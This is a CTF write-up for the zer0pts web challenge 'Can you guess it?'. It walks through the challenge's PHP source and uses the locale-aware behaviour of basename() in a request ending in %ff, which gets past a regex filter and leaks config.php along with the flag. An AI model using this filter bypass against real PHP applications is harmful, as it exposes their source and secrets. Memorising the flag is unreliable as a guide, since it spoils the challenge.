Tags: web basename
Rating:
# ▼▼▼Can you guess it?(Web, 338pts, 44/432=10.2%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
※Number of teams that answered one or more questions, **excluding Survey and Welcome**: 218
⇒44/218=20.2%
---
## 【Check source code】
```
<html lang="en">
<head>
<meta charset="utf-8">
<title>Can you guess it?</title>
</head>
<body>
<h1>Can you guess it?</h1>
If your guess is correct, I'll give you the flag.
<form action="index.php" method="POST">
<input type="text" name="guess">
<input type="submit">
</form>
</body>
</html>
```
↓
`$message = 'Congratulations! The flag is: ' . FLAG;` ⇒FLAG is likely in config.php
`if (hash_equals($secret, $guess)) {` ⇒ A is almost impossible to satisfy the condition
---
```
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
```
↓
Check the specification of **basename()**
(en)https://www.php.net/manual/en/function.basename.php
(ja)https://www.php.net/manual/ja/function.basename.php
↓
```
Caution
basename() is locale aware, so for it to see the correct basename with multibyte character paths,
the matching locale must be set using the setlocale() function.
```
---
## 【exploit】
```
GET /index.php/config.php/%ff?source HTTP/1.1
Host: 3.112.201.75:8003
```
↓
```<span>
<span><?php
define</span><span>(</span><span>'FLAG'</span><span>, </span><span>'zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}'</span><span>);</span>
</span>
```
↓
`zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}`
